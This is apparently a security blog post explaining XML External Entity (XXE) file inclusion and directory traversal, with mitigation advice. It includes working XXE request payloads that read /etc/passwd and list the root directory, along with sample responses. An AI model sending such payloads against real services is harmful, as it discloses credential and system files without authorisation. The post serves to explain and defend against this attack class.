XML File Inclusion and Path Traversal Attacks
Colin Wong’s Paper XML Port Scanning - Bypassing Restrictive Perimeter Firewalls describes a way of abusing XML parsers in web services and web applications to footprint DMZ and backend services. Actually the attack scheme is not new. It was already described in a Post on October 2002 by Gregory Steuck as XML eXternal Entity Attack (XXE).
So here are my two cents on this topic: Actually the attack scheme is more potent than they imagine. Depending on the application it is possible to include server-side files into XML documents. If e.g. the content of the processed XML document is stored in database and it is possible to read the database through the same or other web services or web applications then the file content is disclosed.
For example a request could look like this…
<?xml version=”1.0″ encoding=”UTF-8″ ?>
<!DOCTYPE req [
<!ENTITY value SYSTEM “/etc/passwd”>
]>
<req>
<field>&value;</field>
</req>
… and here the corresponding response:
<?xml version=”1.0″ encoding=”UTF-8″ ?>
<resp>
<field>root:x:0:0:root:/root:/bin/bash
…</field>
</resp>
So far I have not succeeded in including arbitrary XML documents since they often violate DTD definitions of the surrounding XML. But if the DTD allows further XML tags in a field extraction of XML documents should also be possible. But in general my experience shows that Java property files, /etc/passwd, /etc/shadow or even PEM-encoded SSL key material pose no problems.
Due to the fact that directories can often be read just like a file, as it is the case in Java, it is possible to traverse directories and to read files without guessing paths:
<?xml version=”1.0″ encoding=”UTF-8″ ?>
<!DOCTYPE req [
<!ENTITY value SYSTEM “/”>
]>
<req>
<field>&value;</field>
</req>
… and here the response to the above request:
<?xml version=”1.0″ encoding=”UTF-8″ ?>
<resp>
<field>bin
dev
etc
…
</field>
</resp>
Actually XML file inclusion is often practiced by Java web application developers and system engineers on their system to include external parts in web.xml and Tomcat server.xml configuration files.
The key to solving this issue is to harden the XML parser by setting restrictive entity parsing options and to implement custom entity resolvers just as it is described in Colin’s paper. Additionally I recommend running the web application with a low-privileged user account and restricting read and write access for this user across the operating system. For the paranoid among us who have deployed a Java based container should consider restricting file and network access through Java policies and security manager.